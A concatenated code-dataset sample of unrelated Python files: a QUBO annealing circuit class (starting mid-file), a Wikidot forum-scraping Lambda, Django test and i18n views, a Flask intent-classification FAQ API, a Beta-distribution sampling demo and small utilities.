                if coef in num.one_locals:  value += num.bits[coef] * self.constant
                # b*b = b for binary bits, so shared bits square to themselves.
                if coef in shared_terms:    value += self.bits[coef] * num.bits[coef]
                new_num.bits[coef] = value
            # Generate ancillary bits to make all 2-locals into 1-locals.
            unique_pairs = {(min(c1,c2), max(c1,c2)) for (c1,c2) in product(
                self.one_locals, num.one_locals) if (c1 != c2)}
            ancillary_bits = self.circuit.allocate(len(unique_pairs))
            # Construct the and gates to make new one-local terms.
            for (c1, c2), a in zip(unique_pairs,ancillary_bits):
                self.circuit.add_and(c1, c2, a)
                # Assign the value of the new ancillary bit as their multiplication.
                if (c1 in self.bits) and (c2 in num.bits):
                    new_num.bits[a] = self.bits[c1] * num.bits[c2]
                if (c2 in self.bits) and (c1 in num.bits):
                    # NOTE(review): doubling assumes the two cross products
                    # self.bits[c1]*num.bits[c2] and self.bits[c2]*num.bits[c1]
                    # are equal — true when both operands share the same bit
                    # encoding, but worth confirming for mixed encodings.
                    if (a in new_num.bits): new_num.bits[a] *= 2
                    else:                   new_num.bits[a] = self.bits[c2] * num.bits[c1]
            # Update the now one-local terms in the new number.
            new_num.one_locals = shared_terms.union(ancillary_bits)
            # Multiply the constants together.
            new_num.constant = self.constant * num.constant
        # Return the new number.
        return new_num

    # Multiplication from the right is the same (int * Number, float * Number).
    def __rmul__(self, num): return self.__mul__(num)

    # Generate the squared value energy function QUBO for this number.
    def squared(self):
        """Return a QUBO whose energy equals (value of this Number)**2."""
        qubo = QUBO()
        # Square all the one-local terms (including constant interactions);
        # b**2 == b for binary bits, so the square of a bit stays one-local.
        for coef in self.one_locals:
            qubo[coef] = self.bits[coef]**2 + self.bits[coef]*2*self.constant
        # Add the interactions for the squared (now two-local) terms.
        for (c1, c2) in combinations(sorted(self.one_locals), 2):
            qubo[(c1,c2)] = 2 * self.bits[c1] * self.bits[c2]
        # Add constant term to QUBO (for squared correctness).
        qubo["c"] = self.constant**2
        return qubo
# Holder for a Quantum Annealing circuit in QUBO form. Keeps track of
# the bits that have been utilized. Produces the squared error energy
# function for numeric operations.
class Circuit:
    """Quantum-annealing circuit in QUBO form.

    Tracks allocated bits, the Numbers built over them, the squared-error
    equations to minimize, and the AND gates used to linearize products.
    """

    def __init__(self):
        self.bits = []        # all allocated bit ids, in allocation order
        self.numbers = []     # Number objects created via self.Number(...)
        self.equations = []   # Numbers whose squared value is minimized
        self.and_gates = []   # QUBOs enforcing ancilla = AND(input1, input2)

    # Generate a collection of bits to be used as ancillary bits.
    def allocate(self, bits):
        """Append *bits* fresh bit ids to the circuit and return them."""
        if len(self.bits) == 0: self.bits += list(range(bits))
        else: self.bits += list(range(self.bits[-1]+1, self.bits[-1]+1+bits))
        return self.bits[len(self.bits)-bits:]

    # Generate a 'Number' object with memory allocated in this circuit.
    def Number(self, bits, exponent=0, signed=False):
        self.numbers.append( Number(self, self.allocate(bits), exponent, signed) )
        return self.numbers[-1]

    # Add a number that represents an equation to the set of equations.
    def add(self, *args, **kwargs): return self.square(*args, **kwargs)
    def square(self, number):
        """Register *number*; its squared value is minimized by the annealer."""
        self.equations.append( number )

    # Construct an "and" gate over two input terms "c1" and "c2" and
    # an output term "a". Store that and gate for later evaluation.
    def add_and(self, c1, c2, a):
        # Standard AND-gate penalty: zero energy iff a == c1 AND c2.
        self.and_gates.append(
            QUBO({a:3, (c1,c2):1, (c1,a):-2, (c2,a):-2}) )

    # Generate the squared value energy function QUBO for this number.
    def assemble(self, and_strength, verbose=True):
        """Combine all squared equations and AND gates into one QUBO.

        *and_strength* is scaled by the Ising rescale factor of the
        equation-only QUBO so gate penalties dominate the problem weights.
        """
        from qaml.qubo import qubo_ising_rescale_factor
        # Compute the qubo without the and-gate rescale.
        q = QUBO()
        for n in self.equations:
            q += n.squared()
        # Set the rescale to the max Ising weight.
        and_strength *= qubo_ising_rescale_factor(q)
        if (len(self.and_gates) > 0) and verbose:
            print(f"\nUsing and strength {and_strength:.2f}.")
        # Generate a qubo for the squared value function.
        # This is where the computation of the AND gates happens.
        q = QUBO()
        # Add 0 times all numbers to ensure all coefficients are included.
        for n in self.numbers:
            q += 0 * n.bits
        # Add all of the squared equations.
        for n in self.equations:
            q += n.squared()
        # Add all of the and gates with the specified strength.
        for gate in self.and_gates:
            q += gate * and_strength
        return q

    # Get the names of the Number objects in the user function that
    # called this circuit (but not this function directly).
    def _num_names(self):
        """Best-effort: recover variable names from the caller's caller's locals."""
        import inspect
        names = []
        user_locals = inspect.currentframe().f_back.f_back.f_locals
        # Cycle all the Number objects in this circuit.
        for i in range(len(self.numbers)):
            num = self.numbers[i]
            # Fall back to "Num i" when no local variable refers to this Number.
            names.append( ([f"Num {i}"]+[name for name in user_locals
                                         if user_locals[name] is num])[-1] )
        return names

    # Given a string of bits that represents a state of this circuit,
    # decode that string into the corresponding numbers (resolving
    # logical conflicts like broken and gates if appropriate).
    def decode(self, bits):
        """Decode a bit assignment into Number values.

        Returns (values, and_failures) where *and_failures* is the
        percentage of violated AND gates (None when there are no gates).
        Violated gates are repaired in place in *bits*.
        """
        # Check to see if length of the bit sequence is valid.
        if (len(bits) != len(self.bits)):
            raise(IndexError(f"The provided bits have length {len(bits)}, but this circuit has {len(self.bits)} bits."))
        # Compute the decoded values.
        values = []
        # Cycle through the numbers and get their values (in order).
        for i in range(len(self.numbers)):
            num = self.numbers[i]
            num_len = len(num.bit_indices)
            # Compute the value of the number (encode it back into decimal).
            value = sum(bits[idx] * 2**(j+num.exponent) for j, idx
                        in enumerate(num.bit_indices[:num_len-num.signed]))
            # Two's complement: the top bit subtracts its (positive) weight.
            if num.signed: value -= bits[num.bit_indices[-1]] * 2**(num_len-1+num.exponent)
            value += num.constant
            # Record the (name, value, and percentage of failed and gates).
            values.append( value )
        # Fix all of the failed and gates and track the number failed.
        failed_and_gates = 0
        for ag in self.and_gates:
            # Get all involved terms in this AND gate.
            # NOTE(review): this parsing assumes the QUBO stores coefficient
            # keys as strings like "a5" / "b1b2" with 1-based bit labels —
            # confirm against qaml.qubo's key normalization.
            inputs = set()
            output = None
            for coef in ag:
                if coef[0] == "a": output = int(coef[1:])
                else: inputs.update(map(int,coef[1:].split('b')))
            inputs.remove(output)
            # Convert the inputs into proper indices.
            c1, c2 = [i-1 for i in inputs]
            a = output - 1
            # Check to see if the gate was violated.
            if (int(bits[c1] and bits[c2]) != bits[a]):
                failed_and_gates += 1
                # Fix the gate if it was violated.
                bits[a] = int(bits[c1] and bits[c2])
        and_failures = (None if (len(self.and_gates) == 0) else
                        100 * failed_and_gates / len(self.and_gates))
        # Return the (list of values, and the % of and-gates broken).
        return values, and_failures

    # Run this circuit as if executing on a quantum annealer. Most
    # importantly, turn the binary representations back into
    # interpretable results and resolve any logical inconsistencies.
    # Also, attempt to name the numbers with the variable names from
    # the scope of the caller of this function.
    #
    # See documentation for "qaml.run_qubo" for full list of available
    # keyword arguments to this function.
    #
    # If you are using a custom System, then the keywork arguments for
    # the "System.samples" function could also be passed in here.
    #
    def run(self, and_strength=1/2, min_only=True, display=True, **run_qubo_kwargs):
        """Assemble, sample, decode, and (optionally) tabulate the results.

        Returns the list of decoded value-tuples that achieved the desired
        energy (only the minimum-energy ones when *min_only* is True).
        """
        from qaml import run_qubo
        from qaml.systems import System
        qubo = self.assemble(and_strength=and_strength, verbose=display)
        system = System(qubo, constant=qubo.get('c',0))
        if display: print("\n"+str(qubo)+"\n")
        results = run_qubo(qubo, min_only=False, display=False, **run_qubo_kwargs)
        # Get the total number of samples that were drawn from the system.
        total_samples = sum(r[-1] for r in results.info.values())
        # Capture all the outputs for each number.
        outputs = {}
        info_names = []
        for bits in results:
            # Get the (energy, chain break fraction, occurrence)[1:] for the bit pattern.
            bits_info = results.info[tuple(bits)][1:]
            # Implicitly correct and gates, count failures, get numeric values.
            values, and_fails = self.decode( bits )
            if (type(and_fails) == type(None)): and_fails = tuple()
            else:
                and_fails = (and_fails,)
                if ("and breaks" not in info_names): info_names += ["and breaks"]
            if (len(bits_info) > 1) and ("chain breaks" not in info_names):
                info_names += ["chain breaks"]
            # Compute the energy of the (corrected) set of bits.
            energy = system.energy(bits)
            # Store the information about AND failure rates and info if available.
            key = (energy,) + tuple(values)
            outputs[key] = outputs.get(key, []) + [and_fails + bits_info[:-1]] * bits_info[-1]
        # Reduce to only the minimum energy outputs if that was requested.
        # Notice this is done *after* correcting the AND gates.
        if min_only:
            min_energy = min(outputs, key=lambda k: k[0])[0]
            for k in list(outputs):
                if (k[0] > min_energy): outputs.pop(k)
        solutions = []
        # Get the names of the Number objects (for tracking / displaying).
        num_names = self._num_names()
        # Print out all of the outputs.
        printout = [num_names + info_names + ["Occurrence", "Energy"]]
        for key in sorted(outputs):
            energy, values = key[0], key[1:]
            solutions.append(values)
            # Convert info into percentages.
            info = [sum(row[i] for row in outputs[key]) / len(outputs[key])
                    for i in range(len(info_names))]
            info = [f"{val: 5.1f}%" for val in info]
            printout += [ list(map(str, values)) + info +
                          [str(len(outputs[key]))] + [str(energy)] ]
        # If "display", then convert the printout into a table.
        if display:
            print(f"System collected {total_samples} samples.\n")
            spacer = "\t"
            # First, shift all values so they have a leading space.
            for row in printout[1:]:
                for i in range(len(row)): row[i] = " " + row[i]
            # Now find the largest width column.
            col_widths = [max(len(row[i]) for row in printout)
                          for i in range(len(printout[0]))]
            # Print the header.
            for val,width in zip(printout.pop(0), col_widths):
                print(f"{val:<{width}s}", end=spacer)
            print()
            # Print all of the rows.
            for row in printout:
                for val,width in zip(row, col_widths):
                    print(f"{val:>{width}s}", end=spacer)
                print()
        # Return the list of values that achieved desired energy performance.
        return solutions
| StarcoderdataPython |
352047 | import requests
import random
import string
import json
import re
import config
import helpers
import boto3
import os
from bs4 import BeautifulSoup
#temp
# import logging
# logger = logging.getLogger()
# logger.setLevel(logging.INFO)
def lambda_handler(event, context):
    """AWS Lambda entry point: scrape Wikidot forum threads queued via SQS.

    For each SQS record, fetches the thread metadata and every page of
    posts from the Wikidot ajax module connector, parses them with
    BeautifulSoup/regex, and PUTs one payload per page to the SCUTTLE
    callback URL.  Returns False when a thread cannot be fetched.
    """
    for record in event['Records']:
        callback_url = record['messageAttributes']['callback_url']['stringValue']
        wd_thread_id = record['messageAttributes']['thread_id']['stringValue']
        wikidot_site = record['messageAttributes']['wikidot_site']['stringValue']
        data = {'t': wd_thread_id, 'moduleName': 'forum/ForumViewThreadModule'}
        haystack = helpers.fetch(data, wikidot_site)
        # Do some stuff with the base thread.
        try:
            soup = BeautifulSoup(haystack, 'html.parser')
        except TypeError:  # NoneType, it gone.
            return False  # Send this to SCUTTLE.
        titleblock = soup.find("div", {"class": "forum-breadcrumbs"})
        forum = int(re.search('(?:\/forum\/c-)(\d*)', str(titleblock)).group(1))
        title = re.search('(?:» (?!<))(.*)', str(titleblock)).group(1)
        descriptionblock = soup.find("div", {"class": "description-block well"})
        # Get the subtitle, which is a surprising amount of effort: the
        # "Summary:" label is localized per wiki.
        if wikidot_site == 'scp-ru':  # SCP-RU
            subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Кратко:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
        elif wikidot_site == 'lafundacionscp':  # SCP-ES
            subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Resumen:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
        elif wikidot_site == 'fondationscp':  # SCP-FR
            subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Résumé:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
        elif wikidot_site == 'scp-wiki-de':  # SCP-DE
            subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Beschreibung:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
        else:  # SCP-EN and English-speaking wikis.
            subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Summary:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
        subtitle = ''.join(subtitle)
        # These are artifacts of scraping HTML and not valid in subtitles.
        subtitle = subtitle.replace('\n', '').replace('\t', '')
        # BUG FIX: was "if len(subtitle) is 0:", an identity comparison with
        # an int literal; use truthiness instead.
        if not subtitle:
            subtitle = None
        # Get the creation timestamp for convenience in sorting later.
        created_timestamp = int(re.search('(?:odate time_)(\d*)', str(descriptionblock)).group(1))
        # Get the OP of the thread. This is Wikidot for a per-page
        # discussion thread or a user id otherwise.
        attribution = descriptionblock.find("span", {"class": "printuser"})
        if attribution.string == "Wikidot":
            op_user_id = 0
            op_username = "Wikidot"
        else:
            try:
                op_user_id = int(re.search('(?:userInfo\()(\d*)', str(attribution)).group(1))
                op_username = attribution.text
            except AttributeError:
                try:
                    # Deleted Accounts
                    op_user_id = int(re.search('(?:data-id=\")(\d*)', str(attribution)).group(1))
                    op_username = "Deleted Account (" + str(op_user_id) + ")"
                except AttributeError:
                    try:
                        # Anonymous Accounts
                        # BUG FIX: the closing ")" was missing from this
                        # username (its sibling branch below includes it).
                        op_user_id = 0
                        op_username = "Anonymous User (" + str(re.search('(?:anonymousUserInfo\(\')([\d\.]*)(?:\'\); return false;\"><)', str(attribution)).group(1)) + ")"
                    except AttributeError:
                        # Guest Accounts
                        op_user_id = 0
                        op_username = str(re.search('(?:</a>)([^<]*)', str(attribution)).group(1))
        # What we should have back is HTML laying out a page of forum comments.
        # First, let's determine if there are multiple pages.
        try:
            maxpages = re.search('(?:<span class="pager-no">page \d* of )(\d*)', haystack).group(1)
            maxpages = int(maxpages)
        except AttributeError:
            # NoneType means the pager is absent, i.e. a single page of
            # comments. This is okay.
            maxpages = 1
        # Scrape every page of the thread, sending one payload per page so a
        # huge thread never produces one oversized request.
        for page in range(maxpages):
            actualpage = page + 1
            innerpayload = {}
            haystack = get_thread_page(thread=wd_thread_id, page=actualpage, wikidot_site=wikidot_site)
            # The ajax response is backslash-escaped and wrapped; strip both.
            soup = BeautifulSoup(haystack.replace("\\", "")[2:], 'html.parser')
            posts = soup.find_all("div", id=re.compile("(fpc-)"))
            for idx, post in enumerate(posts):
                wd_post_id = int(re.search('(?:<div class="post" id="post-)(\d*)', str(post)).group(1))
                subject = re.search('(?:<div class="title" id="post-title-\d*">\s*)([^\n]*)', str(post)).group(1)
                # On a blank subject this returns as "</div>"
                if subject == "</div>":
                    subject = None
                # Resolve the author: regular account, then deleted,
                # anonymous, and finally the several flavors of guest.
                try:
                    username = re.search('(?:return false;">)([^<]*)(?:<\/a><\/span>,)', str(post)).group(1)
                    wd_user_id = int(re.search('(?:www\.wikidot\.com\/userkarma.php\?u=)([^\)]*)', str(post)).group(1))
                except AttributeError:  # NoneType, deleted user.
                    try:
                        wd_user_id = int(re.search('(?:data-id=")(\d*)', str(post)).group(1))
                        username = "Deleted Account " + str(wd_user_id)
                    except AttributeError:  # NoneType, anonymous user!
                        try:
                            wd_user_id = 0
                            username = "Anonymous User (" + str(re.search('(?:anonymousUserInfo\(\\\')([\d\.]*)', str(post)).group(1)) + ")"
                        except AttributeError:  # One last NoneType, GUEST user holy crap.
                            try:
                                username = re.search('(?:alt=""/></a>)([^>]*)(?:</span>,)', str(post)).group(1)
                                wd_user_id = 0
                            except AttributeError:  # More guest account types.
                                try:
                                    username = re.search('(?:&default=http:\/\/www.wikidot.com/common--images/avatars/default/a16.png&size=16"\/><\/a>)([^>]*)(?:<\/span>,)', str(post)).group(1)
                                    wd_user_id = 0
                                except AttributeError:
                                    # Guest with a URL in their name.
                                    # BUG FIX: closing ")" was missing from
                                    # the "(guest" suffix.
                                    wd_user_id = 0
                                    tempusername = re.search('(?:rel=\"nofollow\">)([^<]*)(?:<\/a> \(guest\))', str(post)).group(1)
                                    username = tempusername + " (guest)"
                post_created_at = int(re.search('(?:<span class="odate time_)([^\s]*)', str(post)).group(1))
                content = post.find("div", {"class": "content"})
                body = ''.join(str(item) for item in content.contents)
                # Wikidot pads the text with a \n on both sides, which the
                # author didn't write.
                body = body[1:-1]
                try:
                    if post.parent['id'] == 'thread-container-posts':
                        # Top-level response
                        parent = 0
                    else:
                        # 'id' will look like fpc-12345678, take a slice of the string
                        parent = int(post.parent['id'][4:])
                except KeyError:  # We're at the root.
                    parent = 0
                changespresent = post.find("div", {"class": "revisions"})
                if changespresent is not None:
                    # This post was edited; send along a list of revisions and
                    # let those get picked up in a different routine.
                    # We're guaranteed at least two entries in here.
                    changes = re.findall('(?:showRevision\(event, )(\d*)', str(changespresent))
                else:
                    changes = False
                innerpayload[idx] = {"wd_post_id": wd_post_id, "wd_user_id": wd_user_id,
                                     "parent_id": parent, "subject": subject, "username": username,
                                     "timestamp": post_created_at, "changes": changes, "text": body}
            # Wrap this page's payload and send it; SCUTTLE can sort out
            # posts it already has.
            outerpayload = {"wd_thread_id": int(wd_thread_id), "wd_forum_id": forum,
                            "wd_user_id": op_user_id, "wd_username": op_username, "title": title,
                            "subtitle": subtitle, "created_at": created_timestamp, "posts": innerpayload}
            output = json.dumps(outerpayload)
            headers = {"Authorization": "Bearer " + config.scuttle_token, "Content-Type": "application/json"}
            requests.put(callback_url + '/2stacks/thread/posts', data=output, headers=headers)
    return {"job": "complete"}
def get_thread_page(thread: int, page: int, wikidot_site: str):
    """Fetch one page of a Wikidot forum thread via the ajax module connector."""
    payload = {
        't': thread,
        'moduleName': 'forum/ForumViewThreadPostsModule',
        'pageNo': page,
    }
    return helpers.fetch(payload, wikidot_site)
179192 | <reponame>KamilLoska/HeroAttack
def remove_if_exists(mylist, item):
    """Remove every occurrence of *item* from *mylist* in place.

    Does nothing when *item* is absent.  The list object itself is
    mutated (not rebound), so other references to the same list observe
    the change.
    """
    # Rebuild the contents in one O(n) pass via slice assignment instead of
    # repeated list.remove() calls, each of which is O(n).
    mylist[:] = [el for el in mylist if el != item]
def remove_if_exists_copy(mylist, item):
    """Return a new list containing *mylist* with every *item* dropped."""
    return [el for el in mylist if el != item]
def find_first(mylist, item):
    """Return the index of the first occurrence of *item* in *mylist*, or -1 if absent."""
    if item in mylist:
        return mylist.index(item)
    return -1
| StarcoderdataPython |
9713986 | #!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.core.cache import cache
from django.test import TestCase
class PolyaxonBaseTest(TestCase):
    """Project-wide base TestCase.

    Clears the Django cache and patches Celery's ``send_task`` before each
    test so that tests never dispatch real tasks to a broker.
    """

    # Flag for subclasses; not read in this class itself.
    COLLECT_TASKS = False

    def setUp(self):
        # Flush cache
        cache.clear()
        # Mock celery default sent task
        self.mock_send_task()
        super().setUp()
        # Records tasks that were routed to a worker: name -> call details.
        self.worker_send = {}

    def mock_send_task(self):
        """Replace ``current_app.send_task`` with an eager/recording stub."""
        from celery import current_app

        def send_task(name, args=(), kwargs=None, **opts):
            kwargs = kwargs or {}
            if name in current_app.tasks:
                # Known task: execute it eagerly through apply_async.
                task = current_app.tasks[name]
                return task.apply_async(args, kwargs, **opts)
            elif self.worker_send:
                # NOTE(review): this branch only records when worker_send is
                # already non-empty, and setUp resets it to {} — so unknown
                # tasks appear to be silently dropped. Confirm intent.
                self.worker_send[name] = {"args": args, "kwargs": kwargs, "opts": opts}

        current_app.send_task = send_task
class PolyaxonBaseTestSerializer(PolyaxonBaseTest):
    """Base test case for serializer round-trips.

    Subclasses must set the class attributes below and implement
    ``create_one`` / ``test_serialize_one``.
    """

    query = None  # queryset the serializer is exercised against
    serializer_class = None  # DRF serializer under test
    model_class = None  # model the serializer targets
    factory_class = None  # factory used by subclasses in create_one
    expected_keys = {}  # set of keys every serialized item must expose
    num_objects = 2  # how many instances test_serialize_many creates

    def test_serialize_one(self):
        raise NotImplementedError

    def create_one(self):
        """Create a single model instance (implemented by subclasses)."""
        raise NotImplementedError

    def create_multiple(self):
        """Create ``num_objects`` instances via ``create_one``."""
        # Idiom fix: the loop index was unused.
        for _ in range(self.num_objects):
            self.create_one()

    def test_serialize_many(self):
        """Serializing the full queryset yields the expected count and keys."""
        self.create_multiple()
        data = self.serializer_class(self.query.all(), many=True).data
        assert len(data) == self.num_objects
        for d in data:
            assert set(d.keys()) == self.expected_keys
| StarcoderdataPython |
200090 | <filename>dealsengine/apps.py
from django.apps import AppConfig
class DealsengineConfig(AppConfig):
    """Django application configuration for the ``dealsengine`` app."""

    # Dotted path label Django uses to identify this application.
    name = 'dealsengine'
| StarcoderdataPython |
4931394 | <filename>detect_secrets/core/common.py
from .baseline import format_baseline_for_output
def write_baseline_to_file(filename, data):
    """Serialize a baseline dict to *filename*, newline-terminated.

    :param filename: path of the file to (over)write
    :param data: baseline dict formatted via ``format_baseline_for_output``
    :rtype: None
    """
    serialized = format_baseline_for_output(data)
    with open(filename, 'w') as f:  # pragma: no cover
        f.write(serialized + '\n')
| StarcoderdataPython |
1953217 | from flask import Blueprint
from flask import request
from model import QuestionResult
from model2 import Question
from flask import jsonify
import threading
import kashgari
import jieba
import traceback
import tensorflow as tf
from keras import backend as kb
# Capture the TF graph/session at import time so request-handler threads can
# re-enter them when running model inference (see ask_question).
graph = tf.get_default_graph()
sess = tf.Session()
kb.set_session(sess)
from threading_functions import logToQuestion
# Flask blueprint exposing the /test, /ask, /hot and /addone endpoints.
questions = Blueprint('question', __name__)
# Text-classification model loaded once at import time from ./model2.
CNNmodel = kashgari.utils.load_model("model2")
# Maps a predicted intent label to its question_type id in the database.
__dict_info__ = {
    "发工资": 1,
    "发薪通知": 7,
    "实名": 6,
    "工资条": 2,
    "打卡": 5,
    "授权": 3,
    "用工单位": 4,
}
@questions.route("/test")
def test():
    """Health-check endpoint: returns a static marker string."""
    return "question test"
@questions.route("/ask", methods=["POST"])
def ask_question():
    """Classify the intent of a free-text question and return matching FAQ entries.

    Responds with JSON ``{"code", "message", "data"}`` where ``data`` is a
    list of serialized QuestionResult dicts. Low-confidence questions are
    logged on a background thread for later review.
    """
    # question_answer may be HTML rich text.
    result = dict()
    try:
        __question: str = request.json.get('question')
        print(__question)
        # Tokenize and run the intent classifier (top-3 candidates).
        x = list(jieba.cut(__question))
        global graph, sess
        with graph.as_default():
            kb.set_session(sess)
            y = CNNmodel.predict_top_k_class([x], top_k=3)[0]
        print(y)
        __intend_index = 0
        _candidates = set()
        result['data'] = []
        result['code'] = 200
        result['message'] = ""
        if y['confidence'] > 0.5:
            _label = y['label']
            __intend_index = __dict_info__.get(_label, 0)
            print(_label)
            print(__intend_index)
            # Collect the question_type ids of all candidate intents.
            for i in y['candidates']:
                _label = i['label']
                _candidates.add(__dict_info__.get(_label, 0))
            _list = list(_candidates)
            _list.append(__intend_index)
            # For each candidate type, fetch the 5 most-clicked answered
            # questions; mark the primary intent's entries as exact matches.
            for _id in _list:
                questions = Question.select().where(
                    (Question.question_type == _id)
                    & (Question.question_answer != "")).order_by(
                        Question.click_count.desc()).paginate(1, 5)
                for q in questions:
                    if q.question_type == __intend_index:
                        result['data'].append(
                            QuestionResult(q.question_comment,
                                           q.question_answer, q.question_id,
                                           True).__dict__)
                    else:
                        result['data'].append(
                            QuestionResult(q.question_comment,
                                           q.question_answer, q.question_id,
                                           False).__dict__)
        else:
            print(y['confidence'])
            # Persist the unanswered question on a background thread.
            t = threading.Thread(target=logToQuestion,
                                 args=(__question, __intend_index))
            # BUG FIX: Thread.run() executes the target in the CURRENT
            # thread; start() is required to actually spawn a new one.
            t.start()
    except Exception:
        traceback.print_exc()
        result['data'] = []
        result['code'] = 500
        result['message'] = "参数异常"
    return jsonify(result)
@questions.route("/hot")
def get_hot_question():
    """Return all questions flagged as hot, serialized for the client."""
    # BUG FIX: `Question(is_hot=1).select()` instantiated a model and then
    # ran an UNFILTERED select (the is_hot kwarg was ignored by the query);
    # filter explicitly on the column instead.
    questions = Question.select().where(Question.is_hot == 1)
    result = dict()
    result['data'] = []
    result['code'] = 200
    result['message'] = ""
    for q in questions:
        result['data'].append(
            QuestionResult(q.question_comment, q.question_answer,
                           q.question_id, False).__dict__)
    return jsonify(result)
@questions.route("/addone", methods=["POST"])
def add_one():
    """Increment the click counter of one question.

    Expected JSON payload: ``{"questionId": 1}``.
    """
    try:
        __id: int = request.json.get('questionId')
        # BUG FIX: a peewee update query is lazy — .execute() is required
        # for the UPDATE to actually run.
        Question.update(click_count=Question.click_count + 1).where(
            Question.question_id == __id).execute()
    except Exception:
        # Best-effort endpoint: log bad payloads instead of erroring out.
        traceback.print_exc()
    # BUG FIX: a Flask view must return a response; previously returned None.
    return jsonify({"code": 200, "message": "", "data": []})
| StarcoderdataPython |
# Exercise: ask for the kilometres driven by a rented car and the number of
# days it was rented, then compute the price: R$60 per day plus R$0.15 per km.
dias = int(input('Quantos dias alugados ? '))
km = float(input('Quantos KM rodados ? '))
# Total = daily rate * days + per-km rate * distance.
valtotal = (dias * 60) + (km * 0.15)
print('Total a se pagar é de R${:.2f} reais'.format(valtotal))
3289243 | from acondbs.db.sa import sa
##__________________________________________________________________||
def test_import():
    """Smoke test: the ``sa`` SQLAlchemy helper imports and is truthy."""
    assert sa
##__________________________________________________________________||
| StarcoderdataPython |
170051 | from scipy.stats import beta
from matplotlib import pyplot as plt
import numpy as np
def samples(a, b, success, trials, num_episodes=100):
    """Draw samples from the Beta posterior implied by a Beta(a, b) prior
    updated with `success` successes out of `trials` trials.

    :param a: prior shape parameter (alpha)
    :param b: prior shape parameter (beta)
    :param success: number of successes in the experiments
    :param trials: number of trials conducted
    :param num_episodes: number of samples to draw from the posterior
    :return: list of samples
    """
    posterior = beta(a + success, b + trials - success)
    draws = []
    for _ in range(num_episodes):
        draws.append(posterior.rvs())
    return draws
def stats(nums):
    """Print and return the sample mean and population variance of *nums*.

    :param nums: non-empty sequence of numbers
    :return: ``(mean, variance)`` tuple (also printed, as before)
    """
    avg = sum(nums) / len(nums)
    # BUG FIX: the previous code printed the raw SUM of squared deviations
    # and called it "var"; divide by n to get the (population) variance.
    var = sum(pow(x - avg, 2) for x in nums) / len(nums)
    print(avg, var)
    return avg, var
def plots(data, bin_size=20):
    """Draw one histogram subplot per sample list in *data* and show them.

    :param data: list of sample lists (one subplot each), values in [0, 1]
    :param bin_size: number of equal-width bins across [0, 1]
    """
    bins = np.arange(0, bin_size, 1)  # fixed bin size
    bins = bins/bin_size  # normalize bins to the [0, 1) range
    num_plots = len(data)
    for i, nums in enumerate(data):
        # Stack the subplots vertically, one row per distribution.
        plt.subplot(num_plots, 1, i+1)
        # plot histogram
        plt.hist(nums, bins=bins, alpha=0.5)
        # hist = np.histogram(nums, bin_size)
    plt.show()
'''
The conclusion: a better prior requires fewer trials to converge.
A worse prior requires more trials to converge.
'''
# Experiment: same observed data (3 successes in 10 trials) under five
# different Beta priors; sample each posterior and compare the histograms.
successes = 3
trials =10
# alpha, beta defines the shape of beta dist, success and trials is number of experiments.
a, b = 1, 1 # uniform
num_episodes = 2000 # num samples sampled from distribution in order to draw distribution
bin_size = 100
container = []
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 0.5, 0.5 # convex shape prior
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 1.1, 30 # 0-0.2 prior
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 2, 5 # .0-0.8 prior
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 2, 2 # bell shape between 0,1
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
plots(container, bin_size=bin_size)
11289882 | # Copyright (C) 2019 <NAME>
#
# Distributed under terms of the MIT license.
IOTLAB_DOMAIN = "iot-lab.info"
| StarcoderdataPython |
12827281 | # Create your views here.
from django.shortcuts import render
from django.http import HttpResponse
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import pgettext_lazy as __
def index(request):
    """Return a plain-text greeting built from two translated strings."""
    greeting = _('안녕하세요요요')
    # "구어" is only a disambiguation context for translators (any value works).
    context_greeting = __("구어", "안녕안녕")
    combined = f"{greeting} {context_greeting}"
    return HttpResponse(combined)
def sample(request):
    """Render the sample/index.html template (i18n demo page)."""
    return render(request, 'sample/index.html')
# Views that change the active language code.
# 1) Receive the language code through a named URL group.
from django.conf import settings
def trans1(request, code):
    """Activate *code* for this session when supported, else fall back to
    the default language; respond with the code that was applied."""
    # Build the list of supported language codes.
    languages = [language[0] for language in settings.LANGUAGES]
    # Fetch the default language setting (strip any region suffix).
    default_language = settings.LANGUAGE_CODE[:2]
    # Drop any previously stored session language before switching.
    if translation.LANGUAGE_SESSION_KEY in request.session:
        del (request.session[translation.LANGUAGE_SESSION_KEY])
    if code in languages and code != default_language:
        translation.activate(code)
        request.session[translation.LANGUAGE_SESSION_KEY] = code
    else:
        request.session[translation.LANGUAGE_SESSION_KEY] = default_language
        code = default_language
    return HttpResponse("Language Change to " + code)
# 2) Receive the language code via the query string.
def trans2(request):
    """Activate the ``code`` query-string language for this session."""
    code = request.GET.get('code')
    if translation.LANGUAGE_SESSION_KEY in request.session:
        del request.session[translation.LANGUAGE_SESSION_KEY]
    translation.activate(code)
    request.session[translation.LANGUAGE_SESSION_KEY] = code
    # BUG FIX: a Django view must return an HttpResponse; this previously
    # returned None, which raises at request time.
    return HttpResponse("Language Change to " + code)
